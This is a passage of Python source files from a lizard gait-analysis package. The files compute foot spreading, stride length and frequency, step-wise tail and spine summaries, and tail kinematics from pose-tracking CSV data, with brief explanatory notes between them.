widths and heights might deviate. Use the body_axis_deflection_angle calculation first to get the lizards deflection
from the vertical and use this as an indicator if values should be excluded in post-analysis.
This script filters for deflections <= 15 deg if body_axis_deflection_angle is included in selected calculations.
:param kwargs:
:return:
"""
print("spreading")
# TODO: do the width for fore and hind feet individually
### imports
import numpy as np
import pandas as pd
from lizardanalysis.utils import animal_settings, auxiliaryfunctions
# -------------------- only includes stride lengths longer (>) than... (TODO: make config parameter)
threshold_stride_len = 4
# --------------------
### setup
data = kwargs.get('data')
data_rows_count = kwargs.get('data_rows_count')
df_result_current = kwargs.get('df_result_current')
likelihood = kwargs.get('likelihood')
animal = kwargs.get('animal')
filename = kwargs.get('filename')
scorer = data.columns[1][0]
feet = animal_settings.get_list_of_feet(animal)
forefeet = [foot for foot in feet if "F" in foot]
#print("forefeet: ", forefeet)
max_step_phase_count = 1000
filter_deflection = False
if "body_deflection_angle" in df_result_current.columns:
filter_deflection = True
#print("filter_deflection = ", filter_deflection)
active_columns = []
for foot in forefeet:
active_columns.append("stepphase_{}".format(foot))
##################################################################################################
results = {}
result_columns = ["mean_footpair_width", "mean_footpair_height", "mean_footpair_width_F", "mean_footpair_width_H"]
# generate 4 result columns for result dataframe which will contain widths and heights
for col in result_columns:
results[col] = np.full((data_rows_count,), np.NAN)
stride_lengths = []
# -----> Loops through feet
for foot, column in zip(forefeet, active_columns):
mid_stance_widths_F = [] # takes the 3 mid stance indices and calculated the mean angle
mid_stance_widths_H = [] # takes the 3 mid stance indices and calculated the mean angle
mid_stance_heights = [] # takes the 3 mid stance indices and calculated the mean angle
mid_stance_widths = [] # takes the 3 mid stance indices and calculated the mean angle
# create one loop for foot = FR (+ foot pair HL) & for for the opposite:
if foot == "FR":
hindfoot = "HL"
forefootpair = "FL"
hindfootpair = "HR"
hindfoot_column = "stepphase_{}".format(hindfoot)
column = column.strip('')
elif foot == "FL":
hindfoot = "HR"
forefootpair = "FR"
hindfootpair = "HL"
hindfoot_column = "stepphase_{}".format(hindfoot)
column = column.strip('')
for i in range(1, max_step_phase_count):
cell_value = loop_encode(i)
# finds the segment in the dataframe where the step phase equals the current step phase in the loop
df_stance_section = df_result_current[df_result_current[column] == cell_value]
if len(df_stance_section) == 0:
break
df_stance_section_indices = list(df_stance_section.index.values) # contains all frames of stride phase
if len(df_stance_section_indices) > 0:
stance_length = len(df_stance_section_indices)
#print(i, ": stance length {}|{}: ".format(foot, hindfoot), stance_length)
beg_end_tuple = (df_stance_section_indices[0], df_stance_section_indices[-1])
# get the middle of the stance:
if stance_length % 2 == 0:
mid_stance_index = beg_end_tuple[1] - stance_length / 2
else:
mid_stance_index = int((beg_end_tuple[1] - stance_length / 2.0) + 0.5)
# check if the body deflection of lizard is less than or equal to 15 deg:
deflection = df_stance_section.loc[mid_stance_index, "body_deflection_angle"]
if filter_deflection and deflection <= 15.0:
# check the likelihood for the foot label at the mid-stance index:
forefoot_likelihood = data.loc[mid_stance_index, (scorer, foot, "likelihood")]
hindfoot_likelihood = data.loc[mid_stance_index, (scorer, hindfoot, "likelihood")]
forefootpair_likelihood = data.loc[mid_stance_index, (scorer, forefootpair, "likelihood")]
if forefoot_likelihood >= likelihood and hindfoot_likelihood >= likelihood and forefootpair_likelihood >= likelihood:
# get the foot coordinates for fore- and hindfoot at the mid-stance index:
fore_foot_coords = (data.loc[mid_stance_index, (scorer, foot, "x")],
data.loc[mid_stance_index, (scorer, foot, "y")])
hind_foot_coords = (data.loc[mid_stance_index, (scorer, hindfoot, "x")],
data.loc[mid_stance_index, (scorer, hindfoot, "y")])
fore_foot_pair_coords = (data.loc[mid_stance_index, (scorer, forefootpair, "x")],
data.loc[mid_stance_index, (scorer, forefootpair, "y")])
hind_foot_pair_coords = (data.loc[mid_stance_index, (scorer, hindfootpair, "x")],
data.loc[mid_stance_index, (scorer, hindfootpair, "y")])
else:
fore_foot_coords = (np.nan, np.nan)
hind_foot_coords = (np.nan, np.nan)
fore_foot_pair_coords = (np.nan, np.nan)
hind_foot_pair_coords = (np.nan, np.nan)
# calculate the width and height
# the lizards run/climb along the x-axis, therefore width = y and height = x
height = abs(fore_foot_coords[0] - hind_foot_coords[0])
width = abs(fore_foot_coords[1] - hind_foot_coords[1])
width_F = abs(fore_foot_coords[1] - fore_foot_pair_coords[1])
width_H = abs(hind_foot_coords[1] - hind_foot_pair_coords[1])
mid_stance_heights.append(round(height, 2))
mid_stance_widths.append(round(width, 2))
mid_stance_widths_F.append(round(width_F, 2))
mid_stance_widths_H.append(round(width_H, 2))
else:
print(i, ": the lizard does not climbed aligned to vertical {} ... {}".format(deflection, filename))
mean_width = np.mean(mid_stance_widths)
mean_height = np.mean(mid_stance_heights)
mean_width_F = np.mean(mid_stance_widths_F)
mean_width_H = np.mean(mid_stance_widths_H)
#print("mean width and height: ", mean_width, mean_height)
for row in range(data_rows_count):
results[result_columns[0]][row] = mean_width
results[result_columns[1]][row] = mean_height
results[result_columns[2]][row] = mean_width_F
results[result_columns[3]][row] = mean_width_H
#print(results)
return results
def loop_encode(i):
# get utf-8 encoded version of the string
cell_value = 'stance000{}'.format(i).encode()
#print("-----> stance phase cell value :", cell_value)
return cell_value
```
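Once the mid-stance frame is fixed, the width and height above are just absolute coordinate differences (the lizards run along the x-axis of the video, so the x-difference is treated as height and the y-difference as width). A small sketch with made-up mid-stance coordinates:

```python
# Made-up mid-stance (x, y) coordinates for the FR and HL feet.
fore_foot = (512.3, 240.8)
hind_foot = (455.1, 270.2)

# Same convention as lizards_feet_width_and_height(): x-difference = height,
# y-difference = width.
height = abs(fore_foot[0] - hind_foot[0])
width = abs(fore_foot[1] - hind_foot[1])
print(round(height, 2), round(width, 2))
```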
#### File: lizardanalysis/calculations/spreading_between_contralateral_feet.py
```python
from lizardanalysis.utils import animal_settings
import numpy as np
def calc_spreading(**kwargs):
"""
This function calculates the spreading between contralateral feet at TIME
Return: Distance in px between forefeet and between hindfeet
"""
likelihood = kwargs.get('likelihood')
data = kwargs.get("data")
data_rows_count = kwargs.get("data_rows_count")
filename = kwargs.get("filename")
animal = kwargs.get("animal")
feet = animal_settings.get_list_of_feet(animal)
# only use the feet on the right to calculate distance to left counterpart
right_feet = [foot for foot in feet if "R" in foot]
print("right feet: ", right_feet)
scorer = data.columns[1][0]
results = {}
for foot in feet:
results[foot] = np.full((data_rows_count,), np.NAN)
```
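calc_spreading() above stops after initializing its result arrays. A hedged sketch of how the contralateral spreading could be finished, as the Euclidean pixel distance between a right foot and its left counterpart, with made-up coordinates (this is an assumption about the intended calculation, not code from the repository):

```python
import numpy as np

def spreading_distance(right_xy, left_xy):
    """Euclidean distance (px) between a right foot and its left counterpart."""
    return float(np.hypot(right_xy[0] - left_xy[0], right_xy[1] - left_xy[1]))

# Example for one frame: FR vs. FL forefoot coordinates (made up).
print(round(spreading_distance((320.0, 210.0), (318.5, 158.0)), 2))
```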
#### File: lizardanalysis/calculations/step_wise_summary.py
```python
def read_DOKAoutput_files(config):
"""
All filenames should follow the pattern: ID_num_run_trialnum_direction*.csv
If they don't, use the R script nameFixer_v2.R in LizardTails first.
The summary file for the current DOKA project will be stored in the summary_folder in analysis_results.
:param config:
:return:
"""
print('\nCREATING AND WRITING SUMMARY RESULT FILES...\n...')
from pathlib import Path
import os
import errno
import glob
current_path = os.getcwd()
config_file = Path(config).resolve()
project_path = os.path.split(config_file)[0]
result_file_path = os.path.join(current_path, project_path, "analysis-results")
print('result filepath: ', result_file_path)
summary_folder = os.path.join(result_file_path, "analysis-summary")
try:
os.makedirs(summary_folder)
print("folder for summary result files created")
except OSError as e:
if e.errno != errno.EEXIST:
raise
# read in all csv files in folder which contain "_run_"
filelist = glob.glob(os.path.join(result_file_path, "*.csv"))
filelist_split = [x.rsplit(os.sep, 1)[1] for x in filelist]
print("Number of files found: ", len(filelist_split))
#print(" + ", *filelist_split, sep='\n + ')
return result_file_path, summary_folder, filelist_split, filelist
def create_tail_file(config):
### IMPORTS
import pandas as pd
from tkinter import Tk, filedialog
root = Tk()
root.withdraw() # we don't want a full GUI, so keep the root window from appearing
root.call('wm', 'attributes', '.', '-topmost', True)
tail_filepath = filedialog.askopenfilename(parent=root, initialdir=config, title="Select tailMass file") # show an "Open" dialog box and return the path to the selected file
root.destroy()
df_tailMorphs = pd.read_csv(tail_filepath) # read in gravity file
nrows = df_tailMorphs.shape[0]
print("df_TailMorphs: \n", df_tailMorphs)
# create dict which matched tail values with the responding column names in tailMass.csv/df_tailMorphs
tail_values_dict = {"SVL":"svlMM_speciesMean",
"tailLength":"tailLengthMM",
"bodyMass":"bodymass",
"tailMass":"tailMassEstimate",
"BCOMhip":"bodyCOMEstimateHip",
"TCOMhip":"TCOM_2"}
id_dict = {}
#print(list(df_tailMorphs['ID']))
for i, id in enumerate(list(df_tailMorphs['ID'])):
df_subsection_id = df_tailMorphs[df_tailMorphs['ID'] == id]
#print(df_subsection_id)
id_dict_values_dict = {}
for tail_value, tail_column in tail_values_dict.items():
id_dict_values_dict[tail_value] = df_subsection_id[tail_column].values[0]
id_dict[id] = id_dict_values_dict
#print("\n\n\n")
print("{" + "\n".join("{!r}: {!r},".format(k, v) for k, v in id_dict.items()) + "}")
return id_dict
def fill_in_tail_morphs(id_dict, species):
species_tailMorphs_dict = id_dict[species]
return species_tailMorphs_dict
def plot_ampl_vel_acc_stepwise(step_wise_df, summary_folder):
### IMPORTS:
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sn
import os
for row in range(step_wise_df.shape[0]):
df_active = step_wise_df.iloc[row]
# create % of stride x-axis list
ampl = df_active["angular_amplitude"]
x_axis_list = []
for i in range(len(ampl)):
x_axis_list.append((i/len(ampl))*100)
vel = df_active["angular_velocity"]
acc = df_active["angular_acceleration"]
plot_title = df_active["speciesID"] + " " + df_active["runNum"] + " " + df_active["direction"] + " " + df_active["footpair"] + " " + df_active["res_phase"]
### PLOT
fig, axes = plt.subplots(3, 1, sharex=True)
fig.suptitle(plot_title)
# plot amplitude
sn.lineplot(ax=axes[0], x=x_axis_list, y=ampl, color='black')
axes[0].set(ylabel="ang ampl")
#axes[0].axhline(0, ls="-", linewidth=0.8)
axes[0].axhline(df_active["mean_angular_amplitude"], ls="--", linewidth=0.8)
axes[0].text(10, df_active["mean_angular_amplitude"] + 1, "mean")
# plot velocity
sn.lineplot(ax=axes[1], x=x_axis_list, y=vel, color='black')
axes[1].set(ylabel="ang. vel")
axes[1].axhline(0, ls="-", linewidth=0.8)
axes[1].axhline(df_active["rms_angular_velocity"], ls="--", linewidth=0.8)
axes[1].text(10, df_active["rms_angular_velocity"] + 0.2, "RMS")
# plot acceleration
sn.lineplot(ax=axes[2], x=x_axis_list, y=acc, color='black')
axes[2].set(ylabel="ang acc", xlabel="% of stride duration")
axes[2].axhline(0, ls="-", linewidth=0.8)
axes[2].axhline(df_active["rms_angular_acceleration"], ls="--", linewidth=0.8)
axes[2].text(10, df_active["rms_angular_acceleration"] + 0.2, "RMS")
# save plots
fig1 = plt.gcf()
fig1.savefig(os.path.join(summary_folder, "{}.png".format(plot_title)), dpi=300)
plt.show()
return
### MAIN FUNCTION ###
def summarize_stepwise(config):
"""
!Temporary Notice:!
This function was written to work for only tail and spine analysis projects cropped to the default labels for lizards.
Reads in all DOKA output files and summarizes the data step-wise in one big csv document.
Step intervals from the step-detection algorithm are used (calculated in "footfall_by_switches.py").
:param config: the file path to the config file of the project
:return: saves step-wise summary files to a csv file
"""
### IMPORTS:
import pandas as pd
import os
import numpy as np
from lizardanalysis.utils import animal_settings, auxiliaryfunctions
# SETUP
feet = animal_settings.get_list_of_feet('lizard')
stepphase_columns = ["stepphase_{}".format(foot) for foot in feet]
# ----------------
plotting = False
# ----------------
print("summarizing data step wise")
# get a list of all DOKA output files:
result_file_path, summary_folder, filelist_split, filelist = read_DOKAoutput_files(config=config)
# create new dataframe for step-wise combined data
column_names = ["speciesID", "runNum", "direction", "footpair", "res_phase", "mean_body_deflection",
"mean_speed_PXperS",
"cranial_bA", "prox_bA", "tip_bA", "prox_dist", "dist_bA", "cranial_caudal",
"amplitude_Spine_A", "amplitude_Spine_B", "amplitude_Spine_C",
"amplitude_Tail_A", "amplitude_Tail_B", "amplitude_Tail_C", "amplitude_Tail_Tip",
"svl", "tailLength", "bodyMass", "tailMass", "BCOMhip", "TCOMhip",
"angular_amplitude", "angular_velocity", "angular_acceleration",
"mean_abs_angular_amplitude", "rms_angular_velocity", "rms_angular_acceleration"]
step_wise_df = pd.DataFrame(columns=column_names)
#print(step_wise_df)
### PRE-PROCESS
# create tail_file_dict which contains tail morphs for species
id_dict = create_tail_file(config)
# loop through every file and get...:
for file, file_name in zip(filelist, filelist_split):
# ... speciesID, trial, direction from the filename
species = file_name.split("_")[0]
speciesID = file_name.split("_")[0] + "_" + file_name.split("_")[1]
runNum = file_name.split("_")[2] + "_" + file_name.split("_")[3]
direction = file_name.split("_")[4]
### fill in tail mass, TCOM, BCOM, tailLength means per species ###
species_tailMorphs_dict = fill_in_tail_morphs(id_dict, species)
svl = species_tailMorphs_dict["SVL"]
tailLength = species_tailMorphs_dict["tailLength"]
bodyMass = species_tailMorphs_dict["bodyMass"]
tailMass = species_tailMorphs_dict["tailMass"]
BCOMhip = species_tailMorphs_dict["BCOMhip"]
TCOMhip = species_tailMorphs_dict["TCOMhip"]
### PROCESS FILE
print("\n========= ", speciesID, " =========")
print(runNum, direction)
# read in data as data frame
df = pd.read_csv(file, index_col=0)
#print(df.head(), "\n indices: ", df.index)
# find all step intervals for FL|HR, and FR|HL:
unique_steps_dict = {}
for step_col in stepphase_columns:
unique_steps_dict[step_col] = df[step_col].unique()
# delete all "b'nan'" entries in dict
for key, value_list in unique_steps_dict.items():
unique_steps_dict[key] = list(value_list[value_list != "b'nan'"])
#print(unique_steps_dict)
        # find phases that occur in both stepphases of one foot-pair
FR_HL_stepphases = [i for i in unique_steps_dict['stepphase_FR'] if i in unique_steps_dict['stepphase_HL']]
FL_HR_stepphases = [i for i in unique_steps_dict['stepphase_FL'] if i in unique_steps_dict['stepphase_HR']]
#print("---\n", FR_HL_stepphases)
#print(FL_HR_stepphases)
# loop through every step (pairwise) and get section of data frame for rows where both stepphase columns have same phase
# --- FR_HL_stepphases
#print("\n### FR_HL_stepphases ####\n")
#i = 0
#nr_of_swings = [i + 1 for phase in FR_HL_stepphases if "swing" in phase]
#print("nr_of_swings: ", nr_of_swings)
for j, phase in enumerate(FR_HL_stepphases):
footpair = "FR_HL"
if "swing" in phase:
#print("j: ", j)
if j == 0 or j == 1:
                    # stance phases are often empty in the paired columns because their numbering can differ between feet,
                    # so only swing phases are matched here; the stance phase in between is reconstructed below from the frames separating two consecutive swing phases
df_section_swing_old = df.loc[(df['stepphase_FR'] == phase) & (df['stepphase_HL'] == phase)]
#print("phase: ", phase, "\n", df_section_swing_old)
else:
# gets the next swing phase already to get the end for the swing phase
df_section_swing_new = df.loc[(df['stepphase_FR'] == phase) & (df['stepphase_HL'] == phase)]
#print("phase: ", phase, "\n", df_section_swing_new)
if df_section_swing_old.empty == False and df_section_swing_new.empty == False:
# gets the stance phase belonging after df_section_swing_old
df_section_stance_indexSTART = list(df_section_swing_old.index)[-1]
df_section_stance_indexEND = list(df_section_swing_new.index)[0]-1
df_section_stance = df.iloc[df_section_stance_indexSTART:df_section_stance_indexEND]
#print("stance {}: \n".format(FR_HL_stepphases[j-1]), df_section_stance)
# combine step-wise data:
res_phase = "step_" + ''.join(filter(lambda i: i.isdigit(), FR_HL_stepphases[j-1]))
mean_body_deflection = (np.nanmean(df_section_swing_old['body_deflection_angle']) + np.nanmean(df_section_stance['body_deflection_angle']))/2.0
mean_speed_PXperS = (np.nanmean(df_section_swing_old['speed_PXperS']) + np.nanmean(df_section_stance['speed_PXperS']))/2.0
cranial_bA = [i for i in list(df_section_swing_old["cranial_bA"])]+[j for j in list(df_section_stance["cranial_bA"])]
prox_bA = [i for i in list(df_section_swing_old["prox_bA"])]+[j for j in list(df_section_stance["prox_bA"])]
tip_bA = [i for i in list(df_section_swing_old["tip_bA"])]+[j for j in list(df_section_stance["tip_bA"])]
prox_dist = [i for i in list(df_section_swing_old["prox_dist"])]+[j for j in list(df_section_stance["prox_dist"])]
dist_bA = [i for i in list(df_section_swing_old["dist_bA"])]+[j for j in list(df_section_stance["dist_bA"])]
cranial_caudal = [i for i in list(df_section_swing_old["cranial_caudal"])]+[j for j in list(df_section_stance["cranial_caudal"])]
amplitude_Spine_A = [i for i in list(df_section_swing_old["amplitude_Spine_A"])]+[j for j in list(df_section_stance["amplitude_Spine_A"])]
amplitude_Spine_B = [i for i in list(df_section_swing_old["amplitude_Spine_B"])] + [j for j in list(df_section_stance["amplitude_Spine_B"])]
amplitude_Spine_C = [i for i in list(df_section_swing_old["amplitude_Spine_C"])] + [j for j in list(df_section_stance["amplitude_Spine_C"])]
amplitude_Tail_A = [i for i in list(df_section_swing_old["amplitude_Tail_A"])] + [j for j in list(df_section_stance["amplitude_Tail_A"])]
amplitude_Tail_B = [i for i in list(df_section_swing_old["amplitude_Tail_B"])] + [j for j in list(df_section_stance["amplitude_Tail_B"])]
amplitude_Tail_C = [i for i in list(df_section_swing_old["amplitude_Tail_C"])] + [j for j in list(df_section_stance["amplitude_Tail_C"])]
amplitude_Tail_Tip = [i for i in list(df_section_swing_old["amplitude_Tail_Tip"])] + [j for j in list(df_section_stance["amplitude_Tail_Tip"])]
angular_amplitude = [i for i in list(df_section_swing_old["tail_angular_amplitude"])] + [j for j in list(df_section_stance["tail_angular_amplitude"])]
mean_abs_angular_amplitude = (np.nanmean(abs(df_section_swing_old["tail_angular_amplitude"])) + np.nanmean(abs(df_section_stance["tail_angular_amplitude"])))/2.0
angular_velocity = [i for i in list(df_section_swing_old["tail_angular_velocity"])] + [j for j in list(df_section_stance["tail_angular_velocity"])]
rms_angular_velocity = np.nanmean(auxiliaryfunctions.rmsValue(list(df_section_swing_old["tail_angular_velocity"])) + auxiliaryfunctions.rmsValue(list(df_section_stance["tail_angular_velocity"])))/2.0
angular_acceleration = [i for i in list(df_section_swing_old["tail_angular_acceleration"])] + [j for j in list(df_section_stance["tail_angular_acceleration"])]
rms_angular_acceleration = np.nanmean(auxiliaryfunctions.rmsValue(list(df_section_swing_old["tail_angular_acceleration"])) + auxiliaryfunctions.rmsValue(list(df_section_stance["tail_angular_acceleration"])))/2.0
# write data from df_section_swing_old as swing phase and data from df_section_stance as stance phase of one step to new_step_row
# only do in this if loop because this gives complete steps
# the order of these values has to match dataframe above
new_step_row = [speciesID, runNum, direction, footpair, res_phase, mean_body_deflection, mean_speed_PXperS,
cranial_bA, prox_bA, tip_bA, prox_dist, dist_bA, cranial_caudal,
amplitude_Spine_A, amplitude_Spine_B, amplitude_Spine_C,
amplitude_Tail_A, amplitude_Tail_B, amplitude_Tail_C, amplitude_Tail_Tip,
svl, tailLength, bodyMass, tailMass, BCOMhip, TCOMhip,
angular_amplitude, angular_velocity, angular_acceleration,
mean_abs_angular_amplitude, rms_angular_velocity, rms_angular_acceleration]
#print("\n==> new_step_row: \n", new_step_row, "\n")
# append new_step_row to data frame:
df_length = len(step_wise_df)
step_wise_df.loc[df_length] = new_step_row
df_section_swing_old = df_section_swing_new
# --- FL_HR_stepphases
#print("\n### FL_HR_stepphases ####\n")
#i = 0
#nr_of_swings = [(i+1) for phase in FL_HR_stepphases if "swing" in phase][-1]
#print("nr_of_swings: ", nr_of_swings)
for j, phase in enumerate(FL_HR_stepphases):
footpair = "FL_HR"
if "swing" in phase:
#print("j: ", j)
if j == 0 or j == 1:
                    # stance phases are often empty in the paired columns because their numbering can differ between feet,
                    # so only swing phases are matched here; the stance phase in between is reconstructed below from the frames separating two consecutive swing phases
df_section_swing_old = df.loc[(df['stepphase_FL'] == phase) & (df['stepphase_HR'] == phase)]
#print("phase: ", phase, "\n", df_section_swing_old)
else:
# gets the next swing phase already to get the end for the swing phase
df_section_swing_new = df.loc[(df['stepphase_FL'] == phase) & (df['stepphase_HR'] == phase)]
#print("phase: ", phase, "\n", df_section_swing_new)
if df_section_swing_old.empty == False and df_section_swing_new.empty == False:
# gets the stance phase belonging after df_section_swing_old
df_section_stance_indexSTART = list(df_section_swing_old.index)[-1]
df_section_stance_indexEND = list(df_section_swing_new.index)[0] - 1
df_section_stance = df.iloc[df_section_stance_indexSTART:df_section_stance_indexEND]
#print("stance {}: \n".format(FL_HR_stepphases[j - 1]), df_section_stance)
# combine step-wise data:
res_phase = "step_" + ''.join(filter(lambda i: i.isdigit(), FL_HR_stepphases[j - 1]))
mean_body_deflection = (np.nanmean(df_section_swing_old['body_deflection_angle']) + np.nanmean(df_section_stance['body_deflection_angle'])) / 2.0
mean_speed_PXperS = (np.nanmean(df_section_swing_old['speed_PXperS']) + np.nanmean(df_section_stance['speed_PXperS'])) / 2.0
cranial_bA = [i for i in list(df_section_swing_old["cranial_bA"])] + [j for j in list(df_section_stance["cranial_bA"])]
prox_bA = [i for i in list(df_section_swing_old["prox_bA"])] + [j for j in list(df_section_stance["prox_bA"])]
tip_bA = [i for i in list(df_section_swing_old["tip_bA"])] + [j for j in list(df_section_stance["tip_bA"])]
prox_dist = [i for i in list(df_section_swing_old["prox_dist"])] + [j for j in list(df_section_stance["prox_dist"])]
dist_bA = [i for i in list(df_section_swing_old["dist_bA"])] + [j for j in list(df_section_stance["dist_bA"])]
cranial_caudal = [i for i in list(df_section_swing_old["cranial_caudal"])] + [j for j in list(df_section_stance["cranial_caudal"])]
amplitude_Spine_A = [i for i in list(df_section_swing_old["amplitude_Spine_A"])] + [j for j in list(df_section_stance["amplitude_Spine_A"])]
amplitude_Spine_B = [i for i in list(df_section_swing_old["amplitude_Spine_B"])] + [j for j in list(df_section_stance["amplitude_Spine_B"])]
amplitude_Spine_C = [i for i in list(df_section_swing_old["amplitude_Spine_C"])] + [j for j in list(df_section_stance["amplitude_Spine_C"])]
amplitude_Tail_A = [i for i in list(df_section_swing_old["amplitude_Tail_A"])] + [j for j in list(df_section_stance["amplitude_Tail_A"])]
amplitude_Tail_B = [i for i in list(df_section_swing_old["amplitude_Tail_B"])] + [j for j in list(df_section_stance["amplitude_Tail_B"])]
amplitude_Tail_C = [i for i in list(df_section_swing_old["amplitude_Tail_C"])] + [j for j in list(df_section_stance["amplitude_Tail_C"])]
amplitude_Tail_Tip = [i for i in list(df_section_swing_old["amplitude_Tail_Tip"])] + [j for j in list(df_section_stance["amplitude_Tail_Tip"])]
angular_amplitude = [i for i in list(df_section_swing_old["tail_angular_amplitude"])] + [j for j in list(df_section_stance["tail_angular_amplitude"])]
mean_abs_angular_amplitude = (np.nanmean(abs(df_section_swing_old["tail_angular_amplitude"])) + np.nanmean(abs(df_section_stance["tail_angular_amplitude"]))) / 2.0
angular_velocity = [i for i in list(df_section_swing_old["tail_angular_velocity"])] + [j for j in list(df_section_stance["tail_angular_velocity"])]
rms_angular_velocity = np.nanmean(auxiliaryfunctions.rmsValue(list(df_section_swing_old["tail_angular_velocity"])) + auxiliaryfunctions.rmsValue(list(df_section_stance["tail_angular_velocity"]))) / 2.0
angular_acceleration = [i for i in list(df_section_swing_old["tail_angular_acceleration"])] + [j for j in list(df_section_stance["tail_angular_acceleration"])]
rms_angular_acceleration = np.nanmean(auxiliaryfunctions.rmsValue(list(df_section_swing_old["tail_angular_acceleration"])) + auxiliaryfunctions.rmsValue(list(df_section_stance["tail_angular_acceleration"]))) / 2.0
# write data from df_section_swing_old as swing phase and data from df_section_stance as stance phase of one step to new_step_row
# only do in this if loop because this gives complete steps
new_step_row = [speciesID, runNum, direction, footpair, res_phase, mean_body_deflection,
mean_speed_PXperS,
cranial_bA, prox_bA, tip_bA, prox_dist, dist_bA, cranial_caudal,
amplitude_Spine_A, amplitude_Spine_B, amplitude_Spine_C,
amplitude_Tail_A, amplitude_Tail_B, amplitude_Tail_C, amplitude_Tail_Tip,
svl, tailLength, bodyMass, tailMass, BCOMhip, TCOMhip,
angular_amplitude, angular_velocity, angular_acceleration,
mean_abs_angular_amplitude, rms_angular_velocity, rms_angular_acceleration]
#print("\n==> new_step_row: \n", new_step_row, "\n")
# append new_step_row to data frame:
df_length = len(step_wise_df)
step_wise_df.loc[df_length] = new_step_row
df_section_swing_old = df_section_swing_new
print(step_wise_df)
# save results:
step_wise_df.to_csv(os.path.join(summary_folder, "step_wise_summary_tails.csv"), header=True, index=False)
if plotting == True:
plot_ampl_vel_acc_stepwise(step_wise_df, summary_folder)
```
#### File: lizardanalysis/calculations/stride_length_and_frequency.py
```python
def stride_length_and_frequency(**kwargs):
"""
Stride length = distance covered by body during one step (swing + stance) in px
Stride frequency = number of strides per second (determined with the framerate defined in the config file by the user)
"""
import numpy as np
import pandas as pd
#pd.set_option('display.max_columns', None) # for printing the df in console
from lizardanalysis.utils import animal_settings, auxiliaryfunctions
pd.set_option('display.max_columns', None)
# define necessary **kwargs:
data = kwargs.get('data')
data_rows_count = kwargs.get('data_rows_count')
df_result_current = kwargs.get('df_result_current')
likelihood = kwargs.get('likelihood')
animal = kwargs.get('animal')
config = kwargs.get('config')
scorer = data.columns[1][0]
feet = animal_settings.get_list_of_feet(animal)
max_stride_phase_count = 1000
active_columns = []
# get the framerate defined in the config file:
cfg = auxiliaryfunctions.read_config(config)
framerate = cfg['framerate']
for foot in feet:
active_columns.append("stepphase_{}".format(foot))
# print("active_columns: ", active_columns)
stride_lengths = []
results = {}
for foot, column in zip(feet, active_columns):
# print("\n----------- FOOT: ", foot)
column = column.strip('')
# print("column :", column)
results[foot] = np.full((data_rows_count,), np.NAN)
for i in range(1, max_stride_phase_count):
# this looks for all stride phases of the current foot
cell_value = loop_encode(i)
df_stride_section = df_result_current[df_result_current[column] == cell_value]
if len(df_stride_section) == 0:
break
# print(df_stride_section)
df_stride_section_indices = list(df_stride_section.index.values)
if len(df_stride_section_indices) > 0:
beg_end_tuple = (df_stride_section_indices[0], df_stride_section_indices[-1])
# filter for likelihood of labels:
likelihood_shoulder_begin = data.loc[beg_end_tuple[0]][scorer, "Shoulder", 'likelihood']
likelihood_shoulder_end = data.loc[beg_end_tuple[1]][scorer, "Shoulder", 'likelihood']
likelihood_hip_begin = data.loc[beg_end_tuple[0]][scorer, "Hip", 'likelihood']
likelihood_hip_end = data.loc[beg_end_tuple[1]][scorer, "Hip", 'likelihood']
                # only include strides where the lizard's shoulder and hip are tracked above the likelihood threshold
if likelihood_shoulder_begin >= likelihood and likelihood_shoulder_end >= likelihood \
and likelihood_hip_begin >= likelihood and likelihood_hip_end >= likelihood:
# calculate the euclidean distance between last coord and current coord of shoulder and hip -> mean
xdiff_shoulder = data.loc[beg_end_tuple[1]][scorer, "Shoulder", 'x'] - data.loc[beg_end_tuple[0]][
scorer, "Shoulder", 'x']
ydiff_shoulder = data.loc[beg_end_tuple[1]][scorer, "Shoulder", 'y'] - data.loc[beg_end_tuple[0]][
scorer, "Shoulder", 'y']
distance_shoulder = np.sqrt(xdiff_shoulder ** 2 + ydiff_shoulder ** 2)
xdiff_hip = data.loc[beg_end_tuple[1]][scorer, "Hip", 'x'] - data.loc[beg_end_tuple[0]][
scorer, "Hip", 'x']
ydiff_hip = data.loc[beg_end_tuple[1]][scorer, "Hip", 'y'] - data.loc[beg_end_tuple[0]][
scorer, "Hip", 'y']
distance_hip = np.sqrt(xdiff_hip ** 2 + ydiff_hip ** 2)
else:
distance_shoulder = np.NAN
distance_hip = np.NAN
else:
distance_shoulder = np.NAN
distance_hip = np.NAN
distance = get_distance_average(distance_shoulder, distance_hip)
if i > 1:
# saves the distance to results for the current foot, for stride1 beg until stride 2 begin
for row in range(prev_beg_end_tuple[0], beg_end_tuple[0] + 1):
results[foot][row] = distance
stride_lengths.append(abs(prev_beg_end_tuple[0] - (beg_end_tuple[0] + 1)))
#print("stride_lengths: ", stride_lengths)
prev_beg_end_tuple = beg_end_tuple
# calculate the stride frequency
stride_frequency = np.round(framerate/np.mean(stride_lengths), 2)
print(stride_frequency)
frequency_list = np.array(data_rows_count * [stride_frequency], dtype=np.string_)
frequency_list = [decode(freq) for freq in frequency_list]
# rename dictionary keys of results
results = {'stride-length_' + key: value for (key, value) in results.items()}
# print("\n \n -------------------- results FINAL: \n", results)
# add stride frequency to results
results['stride_frequency'] = frequency_list
return results
def loop_encode(i):
# get utf-8 encoded version of the string
cell_value = 'stance000{}'.format(i).encode()
#print("-----> stance phase cell value :", cell_value)
return cell_value
def decode(byte_object):
decoded = byte_object.decode("ASCII")
return decoded
def get_distance_average(dist1, dist2):
import numpy as np
if np.isnan(dist1) == True and np.isnan(dist2) == False:
distance = dist2
elif np.isnan(dist1) == False and np.isnan(dist2) == True:
distance = dist1
elif np.isnan(dist1) == True and np.isnan(dist2) == True:
distance = np.NaN
else:
distance = (dist1 + dist2) / 2.0
return distance
```
#### File: lizardanalysis/calculations/tail_kinematics.py
```python
def tail_kinematics(**kwargs):
"""
calculates the tail angular amplitude, velocity and acceleration of the TCOM relative to the body axis.
The average TCOM location of the lizards is ~30% (get correct value).
Given that we have 4 labels along the tail (Tail_A, Tail_B, Tail_C, Tail_Tip), where A is 25% tailLength, B 50%,
C 75% and Tip 100%, the rough TCOM label is between Tail_A and Tail_B.
We did not use the exact TCOM position in percent to average this, because the label positions on the tail jump
a bit during tracking.
:return: tail_angular_amplitude, tail_angular_velocity, tail_angular_acceleration
"""
### IMPORTS
from lizardanalysis.utils import auxiliaryfunctions
import pandas as pd
import numpy as np
print("tail kinematics")
### SETUP
config = kwargs.get('config')
likelihood = kwargs.get('likelihood')
data = kwargs.get('data')
data_rows_count = kwargs.get('data_rows_count')
scorer = data.columns[1][0]
tail_kinematic_params = ["tail_angular_amplitude", "tail_angular_velocity", "tail_angular_acceleration"]
results = {}
for param in tail_kinematic_params:
